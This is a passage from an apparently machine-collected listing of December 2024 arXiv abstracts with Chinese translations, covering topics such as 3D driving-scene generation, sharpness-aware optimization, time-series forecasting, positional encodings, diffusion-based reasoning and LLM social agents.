摘要: 我们提出了InfiniCube,一种可扩展的方法,用于生成具有高保真度和可控性的无限动态3D驾驶场景。先前的场景生成方法要么受限于有限的规模,要么在生成的序列中缺乏几何和外观一致性。相比之下,我们利用了可扩展3D表示和视频模型的最新进展,实现了允许通过高清地图、车辆边界框和文本描述进行灵活控制的大型动态场景生成。首先,我们构建了一个基于地图条件的稀疏体素的3D生成模型,以释放其在无限体素世界生成方面的能力。然后,我们重新利用了一个视频模型,并通过一组精心设计的像素对齐指导缓冲将其基于体素世界,从而合成一致的外观。最后,我们提出了一种快速前向传递方法,利用体素和像素分支将动态视频提升为具有可控对象的动态3D高斯函数。我们的方法可以生成可控和逼真的3D驾驶场景,广泛的实验证实了我们模型的有效性和优越性。
更新时间: 2024-12-05 07:32:20
领域: cs.CV,cs.AI,cs.GR
Sharpness-Aware Minimization Revisited: Weighted Sharpness as a Regularization Term
Deep Neural Networks (DNNs) generalization is known to be closely related to the flatness of minima, leading to the development of Sharpness-Aware Minimization (SAM) for seeking flatter minima and better generalization. In this paper, we revisit the loss of SAM and propose a more general method, called WSAM, by incorporating sharpness as a regularization term. We prove its generalization bound through the combination of PAC and Bayes-PAC techniques, and evaluate its performance on various public datasets. The results demonstrate that WSAM achieves improved generalization, or is at least highly competitive, compared to the vanilla optimizer, SAM and its variants. The code is available at https://github.com/intelligent-machine-learning/atorch/tree/main/atorch/optimizers.
Updated: 2024-12-05 07:31:10
标题: 敏锐度感知最小化的再探讨:加权敏锐度作为正则化项
摘要: 深度神经网络(DNNs)的泛化被认为与最小值的平坦度密切相关,从而引发了寻找更平坦的最小值和更好泛化的Sharpness-Aware Minimization(SAM)的发展。在本文中,我们重新审视了SAM的损失,并提出了一个更通用的方法,称为WSAM,通过将尖锐度作为正则化项进行了融合。我们通过将PAC和Bayes-PAC技术相结合,证明了它的泛化界限,并在各种公共数据集上评估了其性能。结果表明,与普通优化器、SAM及其变体相比,WSAM实现了改进的泛化,或至少处于竞争优势。代码可在https://github.com/intelligent-machine-learning/atorch/tree/main/atorch/optimizers 上找到。
更新时间: 2024-12-05 07:31:10
领域: cs.LG
Context Matters: Leveraging Contextual Features for Time Series Forecasting
Time series forecasts are often influenced by exogenous contextual features in addition to their corresponding history. For example, in financial settings, it is hard to accurately predict a stock price without considering public sentiments and policy decisions in the form of news articles, tweets, etc. Though this is common knowledge, the current state-of-the-art (SOTA) forecasting models fail to incorporate such contextual information, owing to its heterogeneity and multimodal nature. To address this, we introduce ContextFormer, a novel plug-and-play method to surgically integrate multimodal contextual information into existing pre-trained forecasting models. ContextFormer effectively distills forecast-specific information from rich multimodal contexts, including categorical, continuous, time-varying, and even textual information, to significantly enhance the performance of existing base forecasters. ContextFormer outperforms SOTA forecasting models by up to 30% on a range of real-world datasets spanning energy, traffic, environmental, and financial domains.
Updated: 2024-12-05 07:27:31
标题: 背景重要性:利用上下文特征进行时间序列预测
摘要: 时间序列预测往往受到外生上下文特征的影响,除了它们相应的历史数据。例如,在金融领域,很难准确预测股票价格,而不考虑新闻文章、推文等形式的公共情绪和政策决策。尽管这是常识,但当前的最先进预测模型未能整合这种上下文信息,这是因为它的异质性和多模态性。为了解决这个问题,我们引入了ContextFormer,一种新颖的即插即用方法,可以将多模态上下文信息有针对性地融入现有的预训练预测模型中。ContextFormer有效地提取了来自丰富多模态上下文的特定于预测的信息,包括分类、连续、时变甚至文本信息,从而显著提升了现有基础预测模型的性能。在涵盖能源、交通、环境和金融领域的一系列真实数据集上,ContextFormer的表现优于最先进的预测模型高达30%。
更新时间: 2024-12-05 07:27:31
领域: cs.LG,cs.AI
Exploring AI Text Generation, Retrieval-Augmented Generation, and Detection Technologies: a Comprehensive Overview
The rapid development of Artificial Intelligence (AI) has led to the creation of powerful text generation models, such as large language models (LLMs), which are widely used for diverse applications. However, concerns surrounding AI-generated content, including issues of originality, bias, misinformation, and accountability, have become increasingly prominent. This paper offers a comprehensive overview of AI text generators (AITGs), focusing on their evolution, capabilities, and ethical implications. This paper also introduces Retrieval-Augmented Generation (RAG), a recent approach that improves the contextual relevance and accuracy of text generation by integrating dynamic information retrieval. RAG addresses key limitations of traditional models, including their reliance on static knowledge and potential inaccuracies in handling real-world data. Additionally, the paper reviews detection tools that help differentiate AI-generated text from human-written content and discusses the ethical challenges these technologies pose. The paper explores future directions for improving detection accuracy, supporting ethical AI development, and increasing accessibility. The paper contributes to a more responsible and reliable use of AI in content creation through these discussions.
Updated: 2024-12-05 07:23:14
标题: 探索人工智能文本生成、检索增强生成和检测技术:综合概述
摘要: 人工智能(AI)的快速发展导致了强大的文本生成模型的创造,例如大型语言模型(LLMs),这些模型被广泛用于各种应用。然而,围绕AI生成内容的担忧,包括原创性、偏见、错误信息和问责等问题,变得越来越突出。本文提供了对人工智能文本生成器(AITGs)的全面概述,重点关注它们的发展、能力和伦理影响。本文还介绍了检索增强生成(RAG),这是一种最新方法,通过整合动态信息检索来提高文本生成的内容相关性和准确性。RAG解决了传统模型的关键局限,包括它们对静态知识的依赖以及在处理真实世界数据时可能出现的不准确性。此外,本文还回顾了帮助区分AI生成文本和人工撰写内容的检测工具,并讨论了这些技术所带来的伦理挑战。本文探讨了改善检测准确性、支持伦理人工智能发展和增加可访问性的未来方向。通过这些讨论,本文有助于更加负责任和可靠地利用人工智能进行内容创作。
更新时间: 2024-12-05 07:23:14
领域: cs.AI,cs.HC,cs.LG
Developing a Thailand solar irradiance map using Himawari-8 satellite imageries and deep learning models
This paper presents an online platform showing Thailand solar irradiance map every 30 minutes, available at https://www.cusolarforecast.com. The methodology for estimating global horizontal irradiance (GHI) across Thailand relies on cloud index extracted from Himawari-8 satellite imagery, Ineichen clear-sky model with locally-tuned Linke turbidity, and machine learning models. The methods take clear-sky irradiance, cloud index, re-analyzed GHI and temperature data from the MERRA-2 database, and date-time as inputs for GHI estimation models, including LightGBM, LSTM, Informer, and Transformer. These are benchmarked with the estimate from a commercial service X by evaluation of 15-minute ground GHI data from 53 ground stations over 1.5 years during 2022-2023. The results show that the four models exhibit comparable overall MAE performance to the service X. The best model is LightGBM with an overall MAE of 78.58 W/sqm and RMSE of 118.97 W/sqm, while the service X achieves the lowest MAE, RMSE, and MBE in cloudy condition. Obtaining re-analyzed MERRA-2 data for the whole Thailand region is not economically feasible for deployment. When removing these features, the Informer model has a winning performance in MAE of 78.67 W/sqm. The obtained performance aligns with existing literature by taking the climate zone and time granularity of data into consideration. As the map shows an estimate of GHI over 93,000 grids with a frequent update, the paper also describes a computational framework for displaying the entire map. It tests the runtime performance of deep learning models in the GHI estimation process.
Updated: 2024-12-05 07:14:52
标题: 利用日本气象卫星Himawari-8图像和深度学习模型制作泰国太阳辐射图
摘要: 这篇论文介绍了一个在线平台,每隔30分钟显示泰国太阳辐射图,网址为https://www.cusolarforecast.com。估计泰国全球水平辐射(GHI)的方法依赖于从Himawari-8卫星图像中提取的云指数、Ineichen清空天模型与本地调整的Linke浊度,以及机器学习模型。这些方法将来自MERRA-2数据库的清空天辐射、云指数、重新分析的GHI和温度数据,以及日期时间作为GHI估计模型的输入,包括LightGBM、LSTM、Informer和Transformer。这些模型通过评估2022年至2023年期间53个地面站点的15分钟地面GHI数据与商业服务X的估算结果进行了基准测试。结果显示,这四个模型在整体MAE性能方面与服务X相当。最佳模型是LightGBM,整体MAE为78.58 W/sqm,RMSE为118.97 W/sqm,而服务X在多云条件下实现了最低的MAE、RMSE和MBE。获取整个泰国地区的重新分析MERRA-2数据并不经济可行。去除这些特性后,Informer模型在MAE方面的表现最佳,为78.67 W/sqm。获得的性能考虑了现有文献中对气候区域和数据时间粒度的考虑。由于地图显示了超过93,000个网格的GHI估算,并且频繁更新,该论文还描述了一个用于显示整个地图的计算框架。它测试了深度学习模型在GHI估算过程中的运行时性能。
更新时间: 2024-12-05 07:14:52
领域: physics.ao-ph,cs.AI,cs.CV,cs.LG
MIND: Effective Incorrect Assignment Detection through a Multi-Modal Structure-Enhanced Language Model
The rapid growth of academic publications has exacerbated the issue of author name ambiguity in online digital libraries. Despite advances in name disambiguation algorithms, cumulative errors continue to undermine the reliability of academic systems. It is estimated that over 10% paper-author assignments are rectified when constructing the million-scale WhoIsWho benchmark. Existing endeavors to detect incorrect assignments are either semantic-based or graph-based approaches, which fall short of making full use of the rich text attributes of papers and implicit structural features defined via the co-occurrence of paper attributes. To this end, this paper introduces a structure-enhanced language model that combines key structural features from graph-based methods with fine-grained semantic features from rich paper attributes to detect incorrect assignments. The proposed model is trained with a highly effective multi-modal multi-turn instruction tuning framework, which incorporates task-guided instruction tuning, text-attribute modality, and structural modality. Experimental results demonstrate that our model outperforms previous approaches, achieving top performance on the leaderboard of KDD Cup 2024. Our code has been publicly available.
Updated: 2024-12-05 07:12:53
标题: MIND: 通过多模态结构增强语言模型实现有效的错误分配检测
摘要: 学术出版物的快速增长加剧了在线数字图书馆中作者姓名模糊的问题。尽管在姓名消歧算法方面取得了进展,但累积错误仍然持续破坏学术系统的可靠性。据估计,在构建百万级WhoIsWho基准时,超过10%的论文作者分配被纠正。现有的检测不正确分配的努力要么是基于语义的,要么是基于图形的方法,这两种方法都未充分利用论文的丰富文本属性和通过论文属性共现定义的隐含结构特征。为此,本文介绍了一种结构增强的语言模型,将基于图形方法的关键结构特征与来自丰富论文属性的细粒度语义特征相结合,以检测不正确的分配。所提出的模型通过高效的多模态多轮指导调整框架进行训练,该框架结合了任务引导的指导调整、文本属性模态和结构模态。实验结果表明,我们的模型优于先前的方法,在KDD Cup 2024的排行榜上取得了最佳表现。我们的代码已经公开可用。
更新时间: 2024-12-05 07:12:53
领域: cs.CL,cs.AI
HoPE: A Novel Positional Encoding Without Long-Term Decay for Enhanced Context Awareness and Extrapolation
Many positional encodings (PEs) are designed to exhibit long-term decay, based on an entrenched and long-standing inductive opinion: tokens farther away from the current position carry less relevant information. We argue that long-term decay is outdated in the era of LLMs, as LLMs are now applied to tasks demanding precise retrieval of in-context information from arbitrary positions. Firstly, we present empirical analyses on various PEs, demonstrating that models inherently learn attention with only a local-decay pattern while forming a U-shape pattern globally, contradicting the principle of long-term decay. Furthermore, we conduct a detailed analysis of rotary position encoding (RoPE, a prevalent relative positional encoding in LLMs), and found that the U-shape attention is caused by some learned components, which are also the key factor limiting RoPE's expressiveness and extrapolation.Inspired by these insights, we propose High-frequency rotary Position Encoding (HoPE). HoPE replaces the specific components in RoPE with position-independent ones, retaining only high-frequency signals, which also breaks the principle of long-term decay in theory. HoPE achieves two major advantages: (1) Without constraints imposed by long-term decay, contradictory factors that limit spontaneous attention optimization and model extrapolation performance are removed. (2) Components representing positions and semantics are are optimized. These enhances model's context awareness and extrapolation, as validated by extensive experiments.
Updated: 2024-12-05 07:09:27
标题: HoPE: 一种新型的位置编码,具有增强的上下文意识和外推能力,不会出现长期衰减
摘要: 许多位置编码(PEs)被设计为具有长期衰减,基于一种根深蒂固且长期存在的归纳观点:距离当前位置较远的标记携带的相关信息较少。我们认为,在LLMs时代,长期衰减已经过时,因为LLMs现在被应用于需要精确检索任意位置上下文信息的任务。首先,我们对各种PE进行了实证分析,展示了模型在局部衰减模式下本质上学习到了注意力,同时在全局形成了U形模式,与长期衰减原则相矛盾。此外,我们对旋转位置编码(RoPE,LLMs中流行的相对位置编码)进行了详细分析,发现U形注意力是由一些学习到的组件引起的,这些组件也是限制RoPE表达能力和外推的关键因素。受到这些观点的启发,我们提出了高频旋转位置编码(HoPE)。HoPE用位置无关的特定组件替换RoPE中的特定组件,仅保留高频信号,这在理论上也打破了长期衰减原则。HoPE实现了两个主要优势:(1)没有长期衰减的约束,消除了限制自发注意力优化和模型外推性能的矛盾因素。 (2)表示位置和语义的组件被优化。这增强了模型的上下文意识和外推性能,经过广泛实验证实。
更新时间: 2024-12-05 07:09:27
领域: cs.CL,cs.AI,cs.LG
MT3DNet: Multi-Task learning Network for 3D Surgical Scene Reconstruction
In image-assisted minimally invasive surgeries (MIS), understanding surgical scenes is vital for real-time feedback to surgeons, skill evaluation, and improving outcomes through collaborative human-robot procedures. Within this context, the challenge lies in accurately detecting, segmenting, and estimating the depth of surgical scenes depicted in high-resolution images, while simultaneously reconstructing the scene in 3D and providing segmentation of surgical instruments along with detection labels for each instrument. To address this challenge, a novel Multi-Task Learning (MTL) network is proposed for performing these tasks concurrently. A key aspect of this approach involves overcoming the optimization hurdles associated with handling multiple tasks concurrently by integrating a Adversarial Weight Update into the MTL framework, the proposed MTL model achieves 3D reconstruction through the integration of segmentation, depth estimation, and object detection, thereby enhancing the understanding of surgical scenes, which marks a significant advancement compared to existing studies that lack 3D capabilities. Comprehensive experiments on the EndoVis2018 benchmark dataset underscore the adeptness of the model in efficiently addressing all three tasks, demonstrating the efficacy of the proposed techniques.
Updated: 2024-12-05 07:07:35
标题: MT3DNet:用于3D手术场景重建的多任务学习网络
摘要: 在图像辅助微创手术(MIS)中,理解手术场景对于实时反馈给外科医生、技能评估和通过协作人机程序改善结果至关重要。在这个背景下,挑战在于准确检测、分割和估计高分辨率图像中描绘的手术场景的深度,同时在3D中重建场景并为每个器械提供分割和检测标签。为了解决这一挑战,提出了一种新颖的多任务学习(MTL)网络,用于同时执行这些任务。这种方法的一个关键方面涉及克服与同时处理多个任务相关的优化障碍,通过将对抗性权重更新集成到MTL框架中,提议的MTL模型通过集成分割、深度估计和对象检测实现了3D重建,从而增强了对手术场景的理解,这与缺乏3D功能的现有研究相比标志着显著进步。对EndoVis2018基准数据集的全面实验突显了该模型在高效解决所有三个任务方面的能力,展示了提议技术的有效性。
更新时间: 2024-12-05 07:07:35
领域: cs.CV,cs.AI,cs.HC,cs.LG
MegaCOIN: Enhancing Medium-Grained Color Perception for Vision-Language Models
In vision-language models (VLMs), the ability to perceive and interpret color and physical environment is crucial for achieving contextually accurate understanding and interaction. However, despite advances in multimodal modeling, there remains a significant lack of specialized datasets that rigorously evaluate a model's capacity to discern subtle color variations and spatial context -- critical elements for situational comprehension and reliable deployment across real-world applications. Toward that goal, we curate MegaCOIN, a high-quality, human-labeled dataset based on \emph{real} images with various contextual attributes. MegaCOIN consists of two parts: MegaCOIN-Instruct, which serves as a supervised fine-tuning (SFT) dataset for VLMs; and MegaCOIN-Bench, an annotated test set that can be used as a stand-alone QA dataset. MegaCOIN~provides three annotated features for 220,000 real images: foreground color, background color, and description of an object's physical environment, constituting 660k human annotations. In addition, MegaCOIN can be applied to benchmark domain generalization (DG) algorithms. We explore benchmarking DG methods in the linear probing setup for VLM and show some new insights. Last but not least, we show that VLMs, including GPT-4o, have subpar color recognition capabilities, and fine-tuning with MegaCOIN can result in improved performance on visual evaluation tasks. In certain cases, MegaCOIN fine-tuned small-scale opensource models such as LLaVA and Bunny can outperform closed-source GPT-4o. We hope the utilities of MegaCOIN can shed light on the directions VLMs can improve and provide a more complex platform for domain generalization algorithms.
Updated: 2024-12-05 07:06:17
标题: MegaCOIN:增强视觉语言模型的中等颗粒度色彩感知
摘要: 在视觉语言模型(VLMs)中,感知和解释颜色和物理环境的能力对于实现情境准确理解和交互至关重要。然而,尽管在多模态建模方面取得了进展,但仍然存在一个显著缺乏专门数据集的问题,这些数据集严格评估模型辨别微妙颜色变化和空间上下文的能力--这是情境理解和可靠部署于现实世界应用的关键元素。为了实现这一目标,我们策划了MegaCOIN,这是一个基于真实图像的高质量、人工标记的数据集,具有各种上下文属性。MegaCOIN包括两个部分:MegaCOIN-Instruct,作为VLMs的监督微调(SFT)数据集;以及MegaCOIN-Bench,作为一个可以作为独立QA数据集使用的带注释的测试集。MegaCOIN为22万张真实图像提供了三个带注释的特征:前景颜色、背景颜色以及物体物理环境的描述,共计660k人类注释。此外,MegaCOIN还可以用于基准测试领域泛化(DG)算法。我们探讨了在线性探测设置中对VLM的基准测试DG方法,并展示了一些新的见解。最后但并非最不重要的是,我们表明VLMs,包括GPT-4o,在颜色识别能力方面表现不佳,而使用MegaCOIN进行微调可以提高视觉评估任务的性能。在某些情况下,经过MegaCOIN微调的小规模开源模型,如LLaVA和Bunny,可以胜过封闭源的GPT-4o。我们希望MegaCOIN的实用性可以为VLMs改进的方向提供启示,并为领域泛化算法提供一个更复杂的平台。
更新时间: 2024-12-05 07:06:17
领域: cs.CV,cs.LG
ToolEyes: Fine-Grained Evaluation for Tool Learning Capabilities of Large Language Models in Real-world Scenarios
Existing evaluations of tool learning primarily focus on validating the alignment of selected tools for large language models (LLMs) with expected outcomes. However, these approaches rely on a limited set of scenarios where answers can be pre-determined, diverging from genuine needs. Furthermore, a sole emphasis on outcomes disregards the complex capabilities required for LLMs to effectively use tools. To tackle this issue, we propose ToolEyes, a fine-grained system tailored for the evaluation of the LLMs' tool learning capabilities in authentic scenarios. The system meticulously examines seven real-world scenarios, analyzing five dimensions crucial to LLMs in tool learning: format alignment, intent comprehension, behavior planning, tool selection, and answer organization. Additionally, ToolEyes incorporates a tool library boasting approximately 600 tools, serving as an intermediary between LLMs and the physical world. Evaluations involving ten LLMs across three categories reveal a preference for specific scenarios and limited cognitive abilities in tool learning. Intriguingly, expanding the model size even exacerbates the hindrance to tool learning. The code and data are available at https://github.com/Junjie-Ye/ToolEyes.
Updated: 2024-12-05 07:05:59
标题: ToolEyes:大型语言模型在现实场景中工具学习能力的细粒度评估
摘要: 现有的工具学习评估主要侧重于验证大型语言模型(LLMs)选择工具与预期结果的一致性。然而,这些方法依赖于一组有限的情景,其中答案可以被预先确定,与真正的需求有所偏离。此外,仅关注结果忽视了LLMs有效使用工具所需的复杂能力。为了解决这个问题,我们提出了ToolEyes,一个为评估LLMs在真实情景中的工具学习能力量身定制的细粒度系统。该系统细致地审查了七个现实世界情景,分析了LLMs在工具学习中至关重要的五个维度:格式对齐、意图理解、行为规划、工具选择和答案组织。此外,ToolEyes还包括一个拥有约600个工具的工具库,作为LLMs和物理世界之间的中介。涉及三类别的十个LLMs的评估显示了对特定情景的偏好和工具学习中有限的认知能力。有趣的是,扩大模型大小甚至加剧了工具学习的阻碍。代码和数据可在https://github.com/Junjie-Ye/ToolEyes 获取。
更新时间: 2024-12-05 07:05:59
领域: cs.CL,cs.AI
LuxEmbedder: A Cross-Lingual Approach to Enhanced Luxembourgish Sentence Embeddings
Sentence embedding models play a key role in various Natural Language Processing tasks, such as in Topic Modeling, Document Clustering and Recommendation Systems. However, these models rely heavily on parallel data, which can be scarce for many low-resource languages, including Luxembourgish. This scarcity results in suboptimal performance of monolingual and cross-lingual sentence embedding models for these languages. To address this issue, we compile a relatively small but high-quality human-generated cross-lingual parallel dataset to train LuxEmbedder, an enhanced sentence embedding model for Luxembourgish with strong cross-lingual capabilities. Additionally, we present evidence suggesting that including low-resource languages in parallel training datasets can be more advantageous for other low-resource languages than relying solely on high-resource language pairs. Furthermore, recognizing the lack of sentence embedding benchmarks for low-resource languages, we create a paraphrase detection benchmark specifically for Luxembourgish, aiming to partially fill this gap and promote further research.
Updated: 2024-12-05 07:05:57
标题: LuxEmbedder:增强卢森堡语句子嵌入的跨语言方法
摘要: 句子嵌入模型在各种自然语言处理任务中发挥关键作用,例如主题建模、文档聚类和推荐系统。然而,这些模型严重依赖平行数据,对于包括卢森堡语在内的许多低资源语言而言,这类数据往往稀缺。这种稀缺性导致这些语言的单语和跨语言句子嵌入模型表现不佳。为了解决这一问题,我们编制了一个相对较小但高质量的人工生成的跨语言平行数据集,用于训练LuxEmbedder,一个增强的具有强大跨语言能力的卢森堡语句子嵌入模型。此外,我们提供证据表明,将低资源语言包含在平行训练数据集中对其他低资源语言可能更有利,而不仅仅依赖于高资源语言对。此外,鉴于低资源语言缺乏句子嵌入基准,我们专门为卢森堡语创建了一个释义检测基准,旨在部分填补这一空白并促进进一步研究。
更新时间: 2024-12-05 07:05:57
领域: cs.CL,cs.AI
Traffic Co-Simulation Framework Empowered by Infrastructure Camera Sensing and Reinforcement Learning
Traffic simulations are commonly used to optimize traffic flow, with reinforcement learning (RL) showing promising potential for automated traffic signal control. Multi-agent reinforcement learning (MARL) is particularly effective for learning control strategies for traffic lights in a network using iterative simulations. However, existing methods often assume perfect vehicle detection, which overlooks real-world limitations related to infrastructure availability and sensor reliability. This study proposes a co-simulation framework integrating CARLA and SUMO, which combines high-fidelity 3D modeling with large-scale traffic flow simulation. Cameras mounted on traffic light poles within the CARLA environment use a YOLO-based computer vision system to detect and count vehicles, providing real-time traffic data as input for adaptive signal control in SUMO. MARL agents, trained with four different reward structures, leverage this visual feedback to optimize signal timings and improve network-wide traffic flow. Experiments in the test-bed demonstrate the effectiveness of the proposed MARL approach in enhancing traffic conditions using real-time camera-based detection. The framework also evaluates the robustness of MARL under faulty or sparse sensing and compares the performance of YOLOv5 and YOLOv8 for vehicle detection. Results show that while better accuracy improves performance, MARL agents can still achieve significant improvements with imperfect detection, demonstrating adaptability for real-world scenarios.
Updated: 2024-12-05 07:01:56
标题: 基于基础设施摄像头感知和强化学习的交通协同仿真框架
摘要: 交通仿真常用于优化交通流量,强化学习(RL)显示出自动交通信号控制的潜力。多智能体强化学习(MARL)特别适用于使用迭代仿真学习交通灯控制策略的网络。然而,现有方法通常假设车辆检测完美,忽视了与基础设施可用性和传感器可靠性相关的现实限制。本研究提出了一个集成CARLA和SUMO的共模拟框架,将高保真度的3D建模与大规模交通流量仿真相结合。安装在CARLA环境内的交通灯杆上的摄像头使用基于YOLO的计算机视觉系统来检测和计数车辆,为SUMO中的自适应信号控制提供实时交通数据输入。训练有四种不同奖励结构的MARL智能体利用这种视觉反馈来优化信号定时并改善网络范围内的交通流量。试验中的实验表明,所提出的MARL方法在使用实时基于摄像头的检测来增强交通条件方面的有效性。该框架还评估了在故障或稀疏传感下MARL的鲁棒性,并比较了YOLOv5和YOLOv8在车辆检测方面的性能。结果表明,虽然更好的准确性可以提高性能,但MARL智能体仍然可以在不完美的检测情况下实现显著的改进,展示了适应真实世界场景的能力。
更新时间: 2024-12-05 07:01:56
领域: eess.SY,cs.LG,cs.SY,eess.IV
OMEGA: Efficient Occlusion-Aware Navigation for Air-Ground Robot in Dynamic Environments via State Space Model
Air-ground robots (AGRs) are widely used in surveillance and disaster response due to their exceptional mobility and versatility (i.e., flying and driving). Current AGR navigation systems perform well in static occlusion-prone environments (e.g., indoors) by using 3D semantic occupancy networks to predict occlusions for complete local mapping and then computing Euclidean Signed Distance Field (ESDF) for path planning. However, these systems face challenges in dynamic, severe occlusion scenes (e.g., crowds) due to limitations in perception networks' low prediction accuracy and path planners' high computation overhead. In this paper, we propose OMEGA, which contains OccMamba with an Efficient AGR-Planner to address the above-mentioned problems. OccMamba adopts a novel architecture that separates semantic and occupancy prediction into independent branches, incorporating two mamba blocks within these branches. These blocks efficiently extract semantic and geometric features in 3D environments with linear complexity, ensuring that the network can learn long-distance dependencies to improve prediction accuracy. Semantic and geometric features are combined within the Bird's Eye View (BEV) space to minimise computational overhead during feature fusion. The resulting semantic occupancy map is then seamlessly integrated into the local map, providing occlusion awareness of the dynamic environment. Our AGR-Planner utilizes this local map and employs kinodynamic A* search and gradient-based trajectory optimization to guarantee planning is ESDF-free and energy-efficient. Extensive experiments demonstrate that OccMamba outperforms the state-of-the-art 3D semantic occupancy network with 25.0% mIoU. End-to-end navigation experiments in dynamic scenes verify OMEGA's efficiency, achieving a 96% average planning success rate. Code and video are available at https://jmwang0117.github.io/OMEGA/.
Updated: 2024-12-05 06:54:29
标题: OMEGA: 通过状态空间模型实现动态环境中空地一体机器人的高效遮挡感知导航
摘要: 空地机器人(AGRs)由于其出色的机动性和多功能性(即飞行和驾驶),在监视和灾难响应中被广泛使用。当前的AGR导航系统在静态遮挡易发环境(例如室内)中表现良好,通过使用3D语义占据网络预测完整局部地图的遮挡,然后计算欧氏有符号距离场(ESDF)进行路径规划。然而,这些系统在动态、严重遮挡场景(例如人群)中面临挑战,因为感知网络的低预测精度和路径规划器的高计算开销限制了其性能。本文提出了OMEGA,其中包含OccMamba和高效的AGR规划器,以解决上述问题。OccMamba采用了一种新颖的架构,将语义和占据预测分为独立的分支,其中包含两个mamba块。这些块有效地在3D环境中提取语义和几何特征,确保网络能够学习长距离依赖以提高预测精度。语义和几何特征在鸟瞰图(BEV)空间内结合,以减少特征融合期间的计算开销。然后将生成的语义占据地图无缝集成到局部地图中,提供对动态环境的遮挡意识。我们的AGR规划器利用这个局部地图,采用动态A*搜索和基于梯度的轨迹优化,以确保规划是ESDF无关且高效的。广泛的实验表明,OccMamba在3D语义占据网络方面表现优越,IoU提高了25.0%。在动态场景中的端到端导航实验验证了OMEGA的效率,实现了96%的平均规划成功率。代码和视频可在https://jmwang0117.github.io/OMEGA/获取。
更新时间: 2024-12-05 06:54:29
领域: cs.RO,cs.AI,cs.CV
Concept Based Continuous Prompts for Interpretable Text Classification
Continuous prompts have become widely adopted for augmenting performance across a wide range of natural language tasks. However, the underlying mechanism of this enhancement remains obscure. Previous studies rely on individual words for interpreting continuous prompts, which lacks comprehensive semantic understanding. Drawing inspiration from Concept Bottleneck Models, we propose a framework for interpreting continuous prompts by decomposing them into human-readable concepts. Specifically, to ensure the feasibility of the decomposition, we demonstrate that a corresponding concept embedding matrix and a coefficient matrix can always be found to replace the prompt embedding matrix. Then, we employ GPT-4o to generate a concept pool and choose potential candidate concepts that are discriminative and representative using a novel submodular optimization algorithm. Experiments demonstrate that our framework can achieve similar results as the original P-tuning and word-based approaches using only a few concepts while providing more plausible results. Our code is available at https://github.com/qq31415926/CD.
Updated: 2024-12-05 06:49:37
标题: 基于概念的连续提示用于可解释的文本分类
摘要: 连续提示已被广泛应用于增强各种自然语言任务的性能。然而,这种增强的基本机制仍然不清楚。先前的研究依赖于个别单词来解释连续提示,这缺乏全面的语义理解。受概念瓶颈模型的启发,我们提出了一个框架,通过将连续提示分解为人类可读的概念来解释它们。具体地,为了确保分解的可行性,我们证明总是可以找到一个对应的概念嵌入矩阵和一个系数矩阵来替换提示嵌入矩阵。然后,我们利用GPT-4o生成一个概念池,并使用一种新颖的次模优化算法选择具有区分性和代表性的潜在候选概念。实验证明,我们的框架可以在只使用少量概念的情况下达到类似于原始P-tuning和基于单词的方法的结果,同时提供更合理的结果。我们的代码可在https://github.com/qq31415926/CD上找到。
更新时间: 2024-12-05 06:49:37
领域: cs.CL,cs.AI
Diffusion of Thoughts: Chain-of-Thought Reasoning in Diffusion Language Models
Recently, diffusion models have garnered significant interest in the field of text processing due to their many potential advantages compared to conventional autoregressive models. In this work, we propose Diffusion-of-Thought (DoT), a novel approach that integrates diffusion models with Chain-of-Thought, a well-established technique for improving the reasoning ability of autoregressive language models. In contrast to autoregressive language models that make decisions in a left-to-right, token-by-token manner, DoT allows reasoning steps to diffuse over time through a diffusion language model and offers greater flexibility in trading-off computation for reasoning performance. Our experimental results demonstrate the effectiveness of DoT in multi-digit multiplication, boolean logic, and grade school math problems, with a small diffusion model outperforming a much larger autoregressive model in both efficiency and accuracy. In addition to that, DoT showcases promising self-correction abilities and benefits from existing reasoning-enhancing techniques like self-consistency decoding. Our findings contribute to the understanding and development of reasoning with diffusion language models.
Updated: 2024-12-05 06:49:06
标题: 思想的传播:扩散语言模型中的思维链推理
摘要: 最近,扩散模型在文本处理领域引起了极大的兴趣,因为与传统的自回归模型相比,它们具有许多潜在优势。在这项工作中,我们提出了Diffusion-of-Thought(DoT),这是一种将扩散模型与Chain-of-Thought集成的新方法,Chain-of-Thought是一种改进自回归语言模型推理能力的成熟技术。与自回归语言模型按照从左到右、逐个标记地进行决策不同,DoT允许推理步骤通过扩散语言模型随时间传播,并在计算与推理性能之间提供更大的灵活性。我们的实验结果表明,DoT在多位数乘法、布尔逻辑和小学数学问题中表现出了有效性,一个小型扩散模型在效率和准确性上超过了一个规模更大的自回归模型。除此之外,DoT展示了有前途的自我校正能力,并从现有的增强推理技术中受益,比如自一致性解码。我们的发现有助于理解和开发使用扩散语言模型进行推理。
更新时间: 2024-12-05 06:49:06
领域: cs.CL,cs.AI,cs.LG
A Survey on Large Language Model-Based Social Agents in Game-Theoretic Scenarios
Game-theoretic scenarios have become pivotal in evaluating the social intelligence of Large Language Model (LLM)-based social agents. While numerous studies have explored these agents in such settings, there is a lack of a comprehensive survey summarizing the current progress. To address this gap, we systematically review existing research on LLM-based social agents within game-theoretic scenarios. Our survey organizes the findings into three core components: Game Framework, Social Agent, and Evaluation Protocol. The game framework encompasses diverse game scenarios, ranging from choice-focusing to communication-focusing games. The social agent part explores agents' preferences, beliefs, and reasoning abilities. The evaluation protocol covers both game-agnostic and game-specific metrics for assessing agent performance. By reflecting on the current research and identifying future research directions, this survey provides insights to advance the development and evaluation of social agents in game-theoretic scenarios.
Updated: 2024-12-05 06:46:46
标题: 一个关于基于大型语言模型的社交代理在博弈论场景中的调查
摘要: 博弈论情景已成为评估基于大型语言模型(LLM)的社交代理的社会智能的关键因素。虽然许多研究已经在这些设置中探讨了这些代理,但目前缺乏一份总结当前进展的全面调查。为了填补这一空白,我们系统地回顾了现有关于LLM基础社交代理在博弈论情景中的研究。我们的调查将研究结果分为三个核心组成部分:游戏框架、社交代理和评估协议。游戏框架包括各种游戏情景,从关注选择的游戏到关注沟通的游戏。社交代理部分探讨了代理的偏好、信念和推理能力。评估协议涵盖了用于评估代理性能的游戏无关和游戏特定的指标。通过反思当前研究并确定未来研究方向,本调查为推进在博弈论情景中社交代理的发展和评估提供了见解。
更新时间: 2024-12-05 06:46:46
领域: cs.CL,cs.AI
Techniques for Measuring the Inferential Strength of Forgetting Policies
